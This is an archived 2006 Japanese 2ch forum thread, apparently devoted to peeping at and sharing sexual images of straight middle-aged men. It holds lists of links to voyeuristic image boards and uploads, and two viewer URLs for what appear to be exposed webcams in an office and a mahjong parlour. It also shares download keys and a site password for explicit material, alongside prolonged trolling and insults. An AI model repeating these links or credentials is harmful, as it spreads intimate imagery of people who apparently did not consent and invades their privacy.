5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

ノンケ中年を覗き見放題【URL】24

1 :陽気な名無しさん:2006/11/27(月) 21:34:50 ID:3EkItPwy
☆10×3と名乗る中年親父は絶対レスしないでね
広大なネットにひしめくノンケ中年の群集の中から、皆でお気に入りを見つけていこう
対象年齢は「若過ぎず桶過ぎず」で
 
 
[過去スレ]は>>2-5のへん?
 
[関連サイト]
のんけ親父達の画像掲示板
ttp://bbs01.apricot-fizz.net/nonkeoyaji/
のんけ親父達の画像掲示板ザ・ベスト上半身
ttp://bbs.avi.jp/105382/
のんけ親父達の画像掲示板ザ・ベスト下半身
ttp://imgb.rentalcgi.com/bbs/nonkeoyj/


2 :陽気な名無しさん:2006/11/27(月) 21:35:34 ID:Is8W4B2e
乙よ〜〜〜。

3 :陽気な名無し三鳥:2006/11/28(火) 00:26:22 ID:0YBHZG2X
3取りー!!!

4 :陽気な名無しさん:2006/11/28(火) 00:37:07 ID:J78KvNm8
>>1 ちゃんとテンプレ貼ってね。

10×3 兄さんは歓迎します。キテキテ

4様

5 :陽気な名無しさん:2006/11/28(火) 01:04:39 ID:toI/w3MZ
>>1
ザ・ベスト下半身はアドレス変わってるよ
http://imgb.rentalcgi.com/bbs/nonkeoyk/

6 :陽気な名無しさん:2006/11/28(火) 23:54:37 ID:f1oJ4TNu
ttp://members.jcom.home.ne.jp/2242897401/11gatu/kokan.jpg

7 :陽気な名無しさん:2006/11/29(水) 10:56:40 ID:PghnpnpH
のん父またつながらない

8 :陽気な名無しさん:2006/11/29(水) 21:10:37 ID:+JSqr/5B
これもテンプレに入れて!!
ttp://iboard3.to/pc/bbs.cgi?id=rou7
ttp://bbs01.apricot-fizz.net/video/

9 :陽気な名無しさん:2006/11/30(木) 23:54:12 ID:qGGHC6ut
>>8
上→中年じゃない
下→ノンケじゃない

10 :平目おやじ ◆X2X.2kWTU6 :2006/12/01(金) 01:55:30 ID:RTyK5V3x
特定の名前を出してテンプレ作るなんて
このスレッドも駄目だな
どうでも良いけど馬鹿が大杉
それにしても名指しで出された方の身にも成れよな
もっと楽しくできないの?
非難中傷はこのスレの本意じゃないだろ
25作っちゃうよ又・・

広大なネットにひしめくノンケ中年の群集の中から
、皆でお気に入りを見つけていこう
対象年齢は「若過ぎず桶過ぎず」で

↑この精神でもっと楽しもうぜ〜

11 :陽気な名無しさん:2006/12/01(金) 02:27:50 ID:RTyK5V3x
ノンケ中年を覗き見放題【URL】25
http://love3.2ch.net/test/read.cgi/gaysaloon/1164906309/l50

12 :陽気な名無しさん:2006/12/01(金) 03:25:43 ID:52sMSOfp
>>11
重複ですれたてんなよw
どっちか削除依頼出してこいよな
使えなくなるぞ

13 :陽気な名無しさん:2006/12/01(金) 03:55:49 ID:ci70JB5J
>>11
なんで簡単なルールすら守れないんだろう?

14 :陽気な名無しさん:2006/12/01(金) 04:40:11 ID:RTyK5V3x
>>13
"特定の名前を出してテンプレ作るなんて
このスレッドも駄目だな "

是が読めないの?

15 :陽気な名無しさん:2006/12/01(金) 05:28:19 ID:VNSL9eHh
スレ住人は平目を完全スルーを厳守とテンプレに入れよう。

16 :陽気な名無しさん:2006/12/01(金) 06:29:30 ID:RTyK5V3x
>>15
人気者は辛いな
でも女々しい嫉妬なんかにはまけないぞ〜

17 :陽気な名無しさん:2006/12/01(金) 07:05:08 ID:o8C12h45
>>16
荒し

18 :陽気な名無しさん:2006/12/01(金) 07:23:16 ID:RTyK5V3x
>>17
煽るなよ馬鹿

19 :陽気な名無しさん:2006/12/01(金) 07:27:01 ID:RTyK5V3x
荒らしは辞めろよ
うpも出来ない雑魚馬鹿
7 :陽気な名無しさん :2006/12/01(金) 07:07:54 ID:o8C12h45
違うスレタイでやれよ、コノバカ
9 :陽気な名無しさん :2006/12/01(金) 07:09:50 ID:o8C12h45
寄生虫

20 :陽気な名無しさん:2006/12/01(金) 07:39:17 ID:o8C12h45
>>19
この腐れ荒し!!!

21 :陽気な名無しさん:2006/12/01(金) 07:43:14 ID:RTyK5V3x
>>20
貴様荒らしてるんじゃね〜よ
初心者のくせにもっと年季を入れてから荒らせ
おやじは筋金入りの荒らしさんだぜ

22 :陽気な名無しさん:2006/12/01(金) 07:46:13 ID:o8C12h45
>>21
きちがい

23 :陽気な名無しさん:2006/12/01(金) 07:49:58 ID:RTyK5V3x
初心者→o8C12h45

15 :陽気な名無しさん :2006/12/01(金) 05:28:19 ID:VNSL9eHh
スレ住人は【平目おやじさん】を完全スルーを厳守とテンプレに入れよう。

と書いてあるのに


24 :陽気な名無しさん:2006/12/01(金) 07:53:34 ID:o8C12h45
うれしそうだな ケタケタ

25 :陽気な名無しさん:2006/12/01(金) 08:02:02 ID:RTyK5V3x
初心者=小心者

12 :陽気な名無しさん :2006/12/01(金) 07:55:27 ID:o8C12h45
違うスレタイでやれよ、コノバカ


13 :陽気な名無しさん :2006/12/01(金) 07:56:27 ID:o8C12h45
寄生虫


26 :平目おやじ ◆X2X.2kWTU6 :2006/12/01(金) 08:07:51 ID:RTyK5V3x
スレ住人は平目を完全スルーを厳守

もっとかまってくれクレクレヨン

なんちゃってね

そろそろ銀行強盗に出かけますw
師走は何かとお金が入り用だからね

27 :陽気な名無しさん:2006/12/01(金) 10:29:01 ID:iQz04rJ+
通報しますた

28 :陽気な名無しさん:2006/12/01(金) 10:51:43 ID:G4OOD8Ij
24と25と、今度はどっちを本スレにすれば良いわけ?

25は後々、「ここはおやじが立てたんだよ・・」と言い張られるのが明白
かといって24も、>>1を読む限りどういう意図で立てたのか微妙だし

29 :陽気な名無しさん:2006/12/01(金) 11:04:06 ID:sJRBYgrm
別にスレッド(24)をたてた人間の意向に左右される必要はまったくないし
またスレ違い基地外投稿者のたてた重複スレ(25)は放置するなり
自治スレに重複削除依頼でもだしとけばおk
そもそも基地外がなにを書こうがスルーが基本

30 :陽気な名無しさん:2006/12/01(金) 11:44:12 ID:Rx6GmfA/
広大なネットにひしめくノンケ中年の群集の中から、皆でお気に入りを見つけていこう
対象年齢は「若過ぎず桶過ぎず」で
[関連サイト]
のんけ親父達の画像掲示板
ttp://bbs01.apricot-fizz.net/nonkeoyaji/
のんけ親父達の画像掲示板ザ・ベスト上半身
ttp://bbs.avi.jp/105382/
のんけ親父達の画像掲示板ザ・ベスト下半身
ttp://imgb.rentalcgi.com/bbs/nonkeoyj/
デカチンNo.1の競輪選手は?@競輪/2ちゃんねる
http://money4.2ch.net/test/read.cgi/keirin/1115609617/l50
MEGARIDE --Harley-Davidson & Offroad Bike--
ttp://www.megaride.info/
ちば☆フォトギャラリー
ttp://chibaphoto.jp/index.html
キワム電脳工務店
ttp://www.kiwamu-dennou.co.jp/
梅ちゃんブログ
ttp://blog.livedoor.jp/umechan_blog/
羊のアップローダー
ttp://woolup.ddo.jp/
モザイク禁止掲示板
ttp://ch-f.com/bbs1/
闇窯
ttp://www.yamiboard.com/joyful2/joyful.php
脱衣所
ttp://trch3344.hp.infoseek.co.jp/0827-c/page_01.htm
濡れ濡れフォトブログ
ttp://www.2219sv2.net/blog01/joyful.cgi
妻自慢・私自慢1
ttp://www.2219sv2.net/gzbbs01/joyful.cgi

31 :陽気な名無しさん:2006/12/01(金) 12:34:24 ID:HaUFocLC

のんけ親父達の画像掲示板ザ・ベスト下半身は>>5の通り
脱衣所は既に404
妻自慢・私自慢1は↓に誘導したほうがよかろ
ttp://www.2219.net/menu_gzbbs.html

32 :陽気な名無しさん:2006/12/01(金) 12:37:58 ID:gBP54tHt
いっそ動画うpの紹介禁止にしたら?

33 :陽気な名無しさん:2006/12/01(金) 13:15:15 ID:NWd/KYJY
そうね
動画云々は大人の同性愛板のフケ専おかずスレに貼ってもらいましょ

34 :陽気な名無しさん:2006/12/01(金) 13:39:01 ID:d3pIqJOq
でわ修正・加筆。

[関連サイト]
のんけ親父達の画像掲示板
ttp://bbs01.apricot-fizz.net/nonkeoyaji/
のんけ親父達の画像掲示板ザ・ベスト上半身
ttp://bbs.avi.jp/105382/
のんけ親父達の画像掲示板ザ・ベスト下半身
ttp://imgb.rentalcgi.com/bbs/nonkeoyk/
デカチンNo.1の競輪選手は?@競輪/2ちゃんねる
http://money4.2ch.net/test/read.cgi/keirin/1115609617/l50
MEGARIDE --Harley-Davidson & Offroad Bike--
ttp://www.megaride.info/
ちば☆フォトギャラリー
ttp://chibaphoto.jp/index.html
キワム電脳工務店
ttp://www.kiwamu-dennou.co.jp/
梅ちゃんブログ
ttp://blog.livedoor.jp/umechan_blog/
羊のアップローダー
ttp://woolup.ddo.jp/
モザイク禁止掲示板
ttp://ch-f.com/bbs1/
闇窯
ttp://www.yamiboard.com/joyful2/joyful.php
濡れ濡れフォトブログ
ttp://www.2219sv2.net/blog01/joyful.cgi
妻自慢・私自慢1
ttp://www.2219.net/menu_gzbbs.html
事務所
ttp://cam135793.miemasu.net/ViewerFrame?Mode=Motion&Language=1
雀荘
ttp://cam15001.miemasu.net/ViewerFrame?Mode=Motion&Language=1
オールド・ルーキー チャレンジ日記
ttp://old-rookie.seesaa.net/
西条晧矢の開運フィットネス
ttp://saijou.way-nifty.com/kaiun/
【不細工ハゲ】 キモメン男優出演作品 【デブ爺】
http://pie.bbspink.com/test/read.cgi/avideo/1156817815/

35 :陽気な名無しさん:2006/12/01(金) 13:41:55 ID:d3pIqJOq
携帯用ブックマーク
ttp://c-others.2ch.net/test/-/gaysaloon/i?s=%83m%83%93%83P%92%86%94N

36 :陽気な名無しさん:2006/12/01(金) 20:25:12 ID:qX/jF3zO
z

37 :陽気な名無しさん:2006/12/01(金) 21:29:15 ID:PiVWe5G/
ひらめって本当に最低なやつ!
10×3兄さんに嫉妬して、テンプレに自分のされたことの仕返し。
24と25二つもスレ作ってどうすんの?

38 :陽気な名無しさん:2006/12/01(金) 21:41:25 ID:ZFhkPi6k
やっぱりこのスレ立てたの婆さんなの?

39 :陽気な名無しさん:2006/12/01(金) 21:44:51 ID:tv+39x1n
おまえらってほんとスルーを覚えないよな?
ttp://www.karadagenki.cc/page/main.html

40 :陽気な名無しさん:2006/12/01(金) 21:47:24 ID:gBP54tHt
そう言えば一つ気になることが
前スレで平目がやたらいい子ぶりながらも、
魂胆はないとか強調してたのは、なんだろう

41 :陽気な名無しさん:2006/12/01(金) 21:54:42 ID:ZFhkPi6k
>>39
ごめんなさーい、でもスルーしようが何しようが婆さんは沸いて出るわ
兄さんを踏み台にして益々のさばるわよ
てか兄さんどうしたのよ、婆さん退治の為にお尻を見せてくれたんじゃなかったの!?

てか「PLAYはBARI×2です」って何なのよ
本当に54歳なの? 熟れた親父ってより腐った婆さんだわー!!

42 :陽気な名無しさん:2006/12/01(金) 22:17:26 ID:tv+39x1n
>>41
ほら、もう俺のスレ違いすぎるレスすらスルーできてないしw
専ぶら使って あぼーん、NGワード指定すればいいだけなんだからさあ。
頼むよ 姉さん




43 :陽気な名無しさん:2006/12/01(金) 23:21:43 ID:9VGlc1Bi
ALWAYS三丁目の夕日で名場面と言えば堤真一のステテコ一丁シーン!
・・・の筈なのに全く期待外れだったわぁ
股間ぺったんこ!

44 :陽気な名無しさん:2006/12/02(土) 01:49:30 ID:YIcWMqZN
このスレ経歴短いんだけど、>>39のキモい心霊親父が平目さんなの?

45 :平目おやじ ◆X2X.2kWTU6 :2006/12/02(土) 02:44:33 ID:6Z8OUrTP
>>39
いつか利用させて貰いますw

46 :陽気な名無しさん:2006/12/02(土) 02:58:08 ID:5iJZ8r45
ちょいとの金さんの画像で抜いた

47 :平目おやじ ◆X2X.2kWTU6 :2006/12/02(土) 03:05:02 ID:6Z8OUrTP
同じくちょいとの会社の専務で抜いた
ttp://imgb.rentalcgi.com/tmpn8t3xd/tyoito/small/1164985529.jpg


48 :平目おやじ ◆X2X.2kWTU6 :2006/12/02(土) 05:12:26 ID:6Z8OUrTP
念のため言っておくけど
24はおやじが作ったんじゃないよ
25はおやじが作ったけど・・
どうでも良い所さ放置しますw
どうせ便所の落書きは24も25も同じだしね

49 :平目おやじ ◆X2X.2kWTU6 :2006/12/02(土) 06:07:57 ID:6Z8OUrTP
>>40
わからない?
分からなくても良いけど
目的ははたせた

50 :平目おやじ ◆X2X.2kWTU6 :2006/12/02(土) 08:15:10 ID:6Z8OUrTP
>>42
って

ほら、もう俺のスレ違いすぎるレスすらスルーできてないしw
専ぶら使って あぼーん、NGワード指定すればいいだけ

と言っておきながらなんでおやじのカキコに反応してるんだろう
へんなの・・(小笑い(∩.∩))



51 :平目おやじ ◆X2X.2kWTU6 :2006/12/02(土) 10:30:50 ID:6Z8OUrTP
http://love3.2ch.net/test/read.cgi/gaysaloon/1164906309/l50
25では一人で荒らしてるよ
かまって君が
馬鹿だから名前を変えてもIDが同じなのを知らないらしい
50 :妖怪平目顔 :2006/12/02(土) 03:37:31 ID:GOmFlPP+
ここは便所です

そう言うことで・・

よろぴく



51 :平目おやじ ◇X2X.2kWTU6 :2006/12/02(土) 03:41:11 ID:GOmFlPP+
ここは便所です

そう言うことで・・

よろぴく
(以下略)

52 :陽気な名無しさん:2006/12/02(土) 14:06:43 ID:YIcWMqZN
キモイ 空気嫁

53 :平目おやじ ◆X2X.2kWTU6 :2006/12/02(土) 14:45:16 ID:6Z8OUrTP
きもいくうきよめ・・か
なんのくうき?
ここもあらされたいの?
それとも26つくってほしいわけ?
つくっちゃおかな・・

54 :陽気な名無しさん:2006/12/02(土) 14:46:00 ID:geAYL/Gq
なんかひらめの10×3兄さんたたきが25でははじまってるね。
ひらめはたたいたり、擁護したり何がしたいの?
10×3兄さんのオナニー日記プログにも出没してるし

55 :平目おやじ ◆X2X.2kWTU6 :2006/12/02(土) 15:03:06 ID:6Z8OUrTP
おやじはもう来ないよ
ここにもあっちにも
遊んでる暇が無くなったし
仕事(廃品回収)が忙しくて
そう言うことでよろしこ
25はしつこい粘着君明け渡したよ
おやじの完敗だ・・しつこいしつこい
無視より始末がわるいよ
そう言うことでおやじはここにも25にももうきませんわ
おやじの魂胆は果たせてるから
来る必要もなかったんだけどね
じゃ〜ね
良いお年を・・又来年?

56 :陽気な名無しさん:2006/12/02(土) 16:50:24 ID:orVQPkfO
厚生労働副大臣が12月4日からメタボ日記公開だってー
腹囲体重週1更新、写真も随時掲載だってー 楽しみよ!
h ttp://www.yomiuri.co.jp/politics/news/20061202i306.htm?from=main3

札幌市長の文雄もメタボ日記公開してくださらないかしら?

57 :陽気な名無しさん:2006/12/02(土) 19:47:27 ID:yjN05SXG
ひらめが今までしてきたことと同じことをされて逆ギレ。
そして、敗北宣言。
やっと平和なときが訪れる。
さようならひらめ、どんでんおやじ。

58 :陽気な名無しさん:2006/12/02(土) 20:08:10 ID:yjN05SXG
平和になったので10×3兄さんのおしりが早く見たい。

59 :陽気な名無しさん:2006/12/02(土) 20:16:13 ID:JWJy6ryD
兄さんのおしり見たいよ。

60 :陽気な名無しさん:2006/12/02(土) 20:54:24 ID:5iJZ8r45
お尻はあんまり綺麗じゃなかったわよw
半ケツには萌えたけど

61 :陽気な名無しさん:2006/12/02(土) 21:05:07 ID:yjN05SXG
しりはのんちち下半身ベストにありました!
確かにあまりきれいじゃなかった・・・
ごめんね 兄さん

62 :陽気な名無しさん:2006/12/02(土) 21:28:21 ID:orVQPkfO
いいわ、兄さんのケツはあたしが独り占めするわ

お遍路の三浦友一いい感じで熟れてきたわ、これなら許容範囲内よ!

63 :平目おやじ ◆X2X.2kWTU6 :2006/12/02(土) 22:49:50 ID:6Z8OUrTP
あま〜い
そんなこと程度でへこたれるわけないじゃん〜
がははh
もう来ないは又すぐ来るよと同じ言葉さ
そんなこともわからないの?
25はうざいからここを根城にしてあげるね

64 :平目おやじ ◆X2X.2kWTU6 :2006/12/02(土) 22:57:08 ID:6Z8OUrTP
しかし
25のあの馬鹿のしつこさはマジでうざい
彼処までしつこいと気持ちが悪杉
ここでなら同じ事出来ないだろう
そう言うわけでここもおやじが作ったわけだから
こちらに移動しましたw

65 :陽気な名無しさん:2006/12/02(土) 22:58:35 ID:h3jY10Ub
>>62
友一って一瞬誰かと思ったわよ。
でもイイわよねぇ。
ttp://bb.watch.impress.co.jp/news/2002/04/22/otokonoko.jpg

66 :陽気な名無しさん:2006/12/02(土) 23:03:27 ID:yjN05SXG
お願いします。
もう荒らさないでください。
24と25の二つつくったんだからもう満足でしょ。

67 :陽気な名無しさん:2006/12/02(土) 23:05:29 ID:K8vKe7cu
■ 荒らし・煽りは完全無視・放置。無視できないあなたも荒らしと同類です。

68 :陽気な名無しさん:2006/12/02(土) 23:18:41 ID:orVQPkfO
>>65 ごめんなさーい、素で間違えてたわ友和ね
ドラマでは白髪交じりでもっといい感じだったのよ。
でもボディはまだまだね、必死でダイエットしてるのかしら?
h ttp://www.nhk.or.jp/dodra/index.html

69 :陽気な名無しさん:2006/12/02(土) 23:27:53 ID:wFiy5wb0
紳士服販売店のイメージキャラクターやってる関係上、ぶよぶよの体にはなれないもんなw
ちなみに百恵とペア水着写真(若い頃)見た限りでは、チンコは左曲がりっぽい。

70 :陽気な名無しさん:2006/12/02(土) 23:28:30 ID:5iJZ8r45
じゃあ右手でチンシュしてるってことね

71 :陽気な名無しさん:2006/12/03(日) 00:14:44 ID:5fS41Jla
石田靖デカチンスレが落ちちゃった!!

72 :陽気な名無しさん:2006/12/03(日) 00:14:47 ID:a+/Esyd/
金さんの貼る画像のレベルが高すぎる

73 :陽気な名無しさん:2006/12/03(日) 03:34:05 ID:hIdgY062
のんちちもちょいとも自作自演の馬鹿に犯されてて困ったもんね
ちょっと考えればわかりそうだけど
薬でも飲ませなきゃ洋服脱がせたりなんてできないわよ
もしくは( ━@Д@)ヤラセデシタ
すーつの賛成のホームの泥酔親父みたいなもんwww
ま、そうやってレベル下げてたら投稿する(・о・)ヒトイネになるわね

74 :平目おやじ ◆X2X.2kWTU6 :2006/12/03(日) 04:50:06 ID:itIuwypA
66 :陽気な名無しさん :2006/12/02(土) 23:03:27 ID:yjN05SXG
お願いします。
もう荒らさないでください。
24と25の二つつくったんだからもう満足でしょ。


67 :陽気な名無しさん :2006/12/02(土) 23:05:29 ID:K8vKe7cu
■ 荒らし・煽りは完全無視・放置。無視できないあなたも荒らしと同類です。

はい・・分かりました
もう荒らしませんっていうかいつ荒らしてる?
何処の文言が荒らしに当たるわけ?
おやじを荒らし呼ばわりする君たちの神経が分かりませんがなw

75 :陽気な名無しさん:2006/12/03(日) 08:20:30 ID:P0WVYvQ5
このスレを人体に例えると、どんでんは肝炎ウィルスのような存在ね


76 :陽気な名無しさん:2006/12/03(日) 08:22:13 ID:r9x9mnFA
■ 荒らし・煽りは完全無視・放置。無視できないあなたも荒らしと同類です。

77 :平目おやじ ◆X2X.2kWTU6 :2006/12/03(日) 08:57:38 ID:itIuwypA
>>75
成るほど言い得て妙ですね
一過性感染と持続感染
はじめはここまで長引くとは思ってなかったのに
いい加減やめたい氣持ちはあるんだよ
ただ納得して辞めたいつまり落としどころが欲しいんだよ
なかなか辞められないのはおやじだけの責任じゃないよ

78 :陽気な名無しさん:2006/12/03(日) 09:41:05 ID:KkbKInIy
>>77
これだけありとあらゆる人間に嫌われてるのに、何をお望みなのですか?

79 :平目おやじ ◆X2X.2kWTU6 :2006/12/03(日) 09:46:05 ID:itIuwypA
>>78
人間に嫌われてもかまいませんがな

人に愛されてればそれでいいですw

80 :陽気な名無しさん:2006/12/03(日) 13:16:57 ID:jcE2XxIT
人間と人って何がちがうの?

81 :陽気な名無しさん:2006/12/03(日) 13:19:50 ID:1KyoAf+B
武田鉄矢みたいな説教がましい回答が来るよ

82 :陽気な名無しさん:2006/12/03(日) 15:02:53 ID:KzdNZ4gA
>>73
自作自演でも画像が良きゃいいけど?
リアルのクソ画像の方がつまらん

テレビのバラエティ番組と一緒。
オマイって、あいのりはヤラセだとか騒いでるガキみたい

83 :平目おやじ ◆X2X.2kWTU6 :2006/12/03(日) 15:03:08 ID:itIuwypA
ご要望に応えまして
人のことを人間という人は人を人と思ってない
おやじは人のことを人間なんて言いたくもないから初めから
以下略

ここを作ったのはおやじじゃないよ
24を作ったのは
2006/11/27(月) 21:34:50 ID:3EkItPwy

その日のおやじのIDは
2006/11/27(月) 11:09:23 ID:MFL+VluG

是でおやじが24を作ったんじゃないと分かるでしょう

84 :平目おやじ ◆X2X.2kWTU6 :2006/12/03(日) 15:07:00 ID:itIuwypA
やはりそうか金さんシリーズの会社の同僚及び専務
自作自演のやらせか・・普通に考えればおかしかったけど
専務の全裸を見るまで黙っていて欲しかった

85 :平目おやじ ◆X2X.2kWTU6 :2006/12/03(日) 16:55:31 ID:itIuwypA
http://www.774.cc:8000/upload/src/up13949.zip.html
以前はこんな物アップしてくれた人がいたのにね最近は?
http://www.774.cc:8000/upload-plus2/src/up0478.zip.html
こんなのをアップした人もいたっけ
http://www.774.cc:8000/upload-plus2/src/up0480.zip.html
こんなのもアップしちゃ人がいたよね
なんかあの頃が懐かしい・・

774って重いよね今

86 :陽気な名無しさん:2006/12/03(日) 18:58:44 ID:jcE2XxIT
兄さんって普段どんなとこに住んでいてどんな仕事してるのかとか
性生活以外のことも書いてほしい・・・

87 :陽気な名無しさん:2006/12/03(日) 21:17:00 ID:X1RJGZav
さっきNHKで工事のオッサンがチン毛披露しててビックリしたわ〜
保険料が払えなくてヘルニアの痛みをガマンしてるんだって。

88 :陽気な名無しさん:2006/12/03(日) 21:54:30 ID:gtTj4hEX
>>87
うpして!

兄さんちんぽ見せて!

89 :陽気な名無しさん:2006/12/03(日) 21:55:59 ID:jcE2XxIT
けつのことで怒っちゃったのかな 兄さん・・・

90 :陽気な名無しさん:2006/12/03(日) 22:00:49 ID:gtTj4hEX
けつは見たからちんぽよ!

91 :陽気な名無しさん:2006/12/03(日) 23:44:25 ID:X1RJGZav
>>88
のん父に貼ったわ、再放送もあるみたいよ

兄さんのケツは十分素敵よ!

92 :平目おやじ ◆X2X.2kWTU6 :2006/12/04(月) 00:02:33 ID:itIuwypA
ヽ(^0^)ノわ〜い
うれしいな又技術向上したよ
おやじがここに来てるのはパソコンの知識が向上する
刺激にあふれてるからと言うこともあるんだ
今回VOBファイルをWMVに変換できるようになった
テスト版だから短いけれど↓
http://www.774.cc:8000/upload/src/up13953.zip.html
と言うことでよろしこ

93 :平目おやじ ◆X2X.2kWTU6 :2006/12/04(月) 03:23:51 ID:f3xF1y2/
http://www.774.cc:8000/upload-plus2/src/up0494.zip.html
たからのうら

94 :平目おやじ ◆X2X.2kWTU6 :2006/12/04(月) 07:20:36 ID:f3xF1y2/
http://www.774.cc:8000/upload-plus2/src/up0497.wmv.html
たからのうら

お仕事に行ってきます
月曜日は新聞雑誌にアルミ缶早く行かないと他に所に取られちゃうよ

95 :陽気な名無しさん:2006/12/04(月) 07:41:14 ID:3qwk0ICr
ダウンロードキーも無いのに

96 :平目おやじ ◆X2X.2kWTU6 :2006/12/04(月) 08:02:04 ID:f3xF1y2/
>>95
はぁ?おやじのうpは全部同じだよ
覚えなくても良いけど
DLKey=yaji52

97 :平目おやじ ◆X2X.2kWTU6 :2006/12/04(月) 08:44:32 ID:f3xF1y2/
しまった!
>>93
未熟さを露呈してしまった
フィニッシュが入ってなかった
ただ単に無駄に長いだけの代物
おやじの未熟さゆえに・・そう言うことで
アレをダウンしてもしょうがないよ
あれの続きというのも変だけど
http://www.774.cc:8000/upload-plus2/src/up0500.wmv.html


98 :平目おやじ ◆X2X.2kWTU6 :2006/12/04(月) 11:13:08 ID:f3xF1y2/
http://www.mediafire.com/?czmi2mmjkmw

豊満ビデオのおもて

さてとお仕事頑張ります・・又明日?をお楽しみに



99 :陽気な名無しさん:2006/12/04(月) 11:20:37 ID:Mt3iJThG
ふーん豊満や宝ってノンケ中年ビデオなんだ

100 :陽気な名無しさん:2006/12/04(月) 11:48:40 ID:a1J1C5jC
ウザイわ。

101 :平目おやじ ◆X2X.2kWTU6 :2006/12/04(月) 12:23:49 ID:f3xF1y2/
>>99
ばかクレクレ君のくせに
ありがたくおかずにしろ

>>100
うざいと思ってるのは貴様だけだよ雑魚

102 :平目おやじ ◆X2X.2kWTU6 :2006/12/04(月) 12:49:19 ID:f3xF1y2/
はっきり言っとくぞ

おやじがここにうpしてるのは

自己満足のためだけさ

屁理屈なんかどうでも良い

自己顕示欲さえ満たされれば

おやじは満足なのさ

ちゃんちゃん

103 :平目おやじ ◆X2X.2kWTU6 :2006/12/04(月) 13:05:21 ID:f3xF1y2/
しかし

なんでスルーできないのかな?

いちいち反応しなくていいんだよおやじのすることに

おやじはダウン数が伸びていくだけで満足してるんだから

それ以外の煩わしいことなんかどうでも良いから

おやじのことは無視してね・・頼むから

104 :陽気な名無しさん:2006/12/04(月) 13:19:28 ID:a1J1C5jC
朝から気持ち悪いもの見ちゃったわよ!!>>94

速攻HDから削除したわ。



105 :陽気な名無しさん:2006/12/04(月) 13:27:46 ID:uxO2Gm33
週刊現代の記事で「NHK<性器丸見え>放映の衝撃場面−視聴者仰天の白昼椿事 」ってのがあるけど
これってふだん着の温泉でしょ?
しまったああ最近見てなかった・・・
まさかモロダシ放送してたとは。。。

106 :陽気な名無しさん:2006/12/04(月) 14:07:12 ID:WnmcBRjy
http://15.xmbs.jp/ch.php?ID=miryoku0606&c_num=35564
このHPには熟年や色々なタイプのモロ画像があるんだ。
俺もみたいんだけど、パスワードがわからないよ。
誰か、教えてください!

107 :陽気な名無しさん:2006/12/04(月) 14:29:31 ID:DYkGtyHS
>>105
ふだん着は録画だから違うでしょいくらなんでもw
録画してチェックするとわかるけどヤバいところはちゃんと処理してる。

108 :陽気な名無しさん:2006/12/04(月) 14:35:32 ID:AGjdBHgL
>>oyaji

ブックス●もキボンヌ、出来たらデブ親父者とか、、、職人者とか、、

109 :陽気な名無しさん:2006/12/04(月) 14:46:47 ID:TBTpmdUz
>>106
よく探せば見つかるわよ
中年熟年に関してはあまりいい画像は無かったわ

110 :平目おやじ ◆X2X.2kWTU6 :2006/12/04(月) 14:56:29 ID:f3xF1y2/
>>104
うそつきおね〜さま
喜んでいたしたくせに
人って本当と反対のことを言う癖があるからね
よろこんでいただけましたか?おね〜さま

111 :陽気な名無しさん:2006/12/04(月) 15:06:04 ID:nWAseFEf
人の良さそうな顔してんのよね
ttp://vista.jeez.jp/img/vi6516227205.jpg

112 :陽気な名無しさん:2006/12/04(月) 15:32:34 ID:ZaY2LiU2
>>109
わからん

113 :陽気な名無しさん:2006/12/04(月) 17:40:36 ID:wLnOAIn9
ここはこれからもウォッチングしていくことになるかな?
ttp://www.mhlw.go.jp/bunya/kenkou/metabo/index.html

114 :陽気な名無しさん:2006/12/04(月) 20:43:36 ID:rhNylVEt
兄さんのケツはどう汚いの?
別に汚いとはおもわないよ。
話はちがうけど、兄さんたぶんA型のような気がする★★


115 :陽気な名無しさん:2006/12/04(月) 20:51:41 ID:LUCOJZYt
>>109
パスワードを知ってるかのような表現してるけど、知ってるのかい?
だったら悪ぃけど、みんなに教えろやぁ〜〜〜

116 :平目おやじ ◆X2X.2kWTU6 :2006/12/04(月) 21:13:06 ID:f3xF1y2/
>>115
あそこ
前はoyajiだったけど今は替えられちゃってるよ

117 :陽気な名無しさん:2006/12/04(月) 21:53:38 ID:YPY/IVyb
金さんマジで神ですわ
ひらおみたく映像化してくれたらもっと嬉しい!

118 :陽気な名無しさん:2006/12/04(月) 22:17:01 ID:/Mg1P7Wl
ヒラ夫が突然一切の活動をやめたのは
念願の末やっと出来た彼氏から禁止されたからなんだってね。

119 :陽気な名無しさん:2006/12/04(月) 22:45:31 ID:6Sj0VuGy
>>117
とっくに飽きた

120 :陽気な名無しさん:2006/12/04(月) 22:52:56 ID:YPY/IVyb
>>119
持ってる画像全部うpしてもらってから飽きなさいよ・・

121 :陽気な名無しさん:2006/12/04(月) 23:50:22 ID:HkMj5K2Q
>>118
禁止されたんじゃなくて、ヒラオの方が相手に操を立てて「もう他の人は見ません」てゆう決意表明で全削除したんよ

122 :陽気な名無しさん:2006/12/05(火) 00:03:02 ID:jz40DvQt
ヒラオの奴って、どれとどれがやらせなの?
全部?
それにしても上玉が多かったなぁ。
って言うか、膨大な中から選別してたのかな

123 :陽気な名無しさん:2006/12/05(火) 00:04:21 ID:HT8One/3
でぶろぐの彼の入浴シーン撮った人いる?
ちんぽがゆらゆら映っちゃったって書いてあるのよ・・見たいのよ

124 :陽気な名無しさん:2006/12/05(火) 01:56:49 ID:+G9nX9us
>>107
記事読んだけど、見落としでチンコもろだしになったらしいw
このスレでふだ温毎週録画してる人いないのかああ!!!

125 :陽気な名無しさん:2006/12/05(火) 08:45:57 ID:qYetTjIL
>>111
もしかして今話題な三十代教師?

126 :陽気な名無しさん:2006/12/05(火) 10:19:44 ID:Lo49mFE3
>>118>>121
なんで知ってるの?

127 :陽気な名無しさん:2006/12/05(火) 10:51:09 ID:V7MKwFKQ
で、捨てられたのね?

128 :陽気な名無しさん:2006/12/05(火) 18:08:40 ID:nwomrnlp
>>90 激しく同意
兄さんの包茎ちん○見たいよ〜

129 :陽気な名無しさん:2006/12/05(火) 18:59:07 ID:Glews7ac
こっそりメルで送ってくれてもいいよ〜<兄さん
あそこ見たい〜

130 :陽気な名無しさん:2006/12/05(火) 23:40:25 ID:9Ykl5Mif
>>124
それらしいのが画像掲示板に....

131 :陽気な名無しさん:2006/12/06(水) 00:42:06 ID:WWYflNf8
のん父のお約束にこんな追加が…

●投稿・返信するときの約束事●

◇(2006.12.5更新)誹謗中傷レスの投稿者のリモートホスト公開について
(期間限定 2006.12.8〜2007.1.8)
※目にあまる一部投稿者への対策ですので、それ以外の方はあまり気になさる必要はありません。※
年末年始のアクセス増加時期に向け、無益な論争をさけるための措置として、
誹謗中傷的な発言が多い傾向にあると管理者が判断した投稿者について、
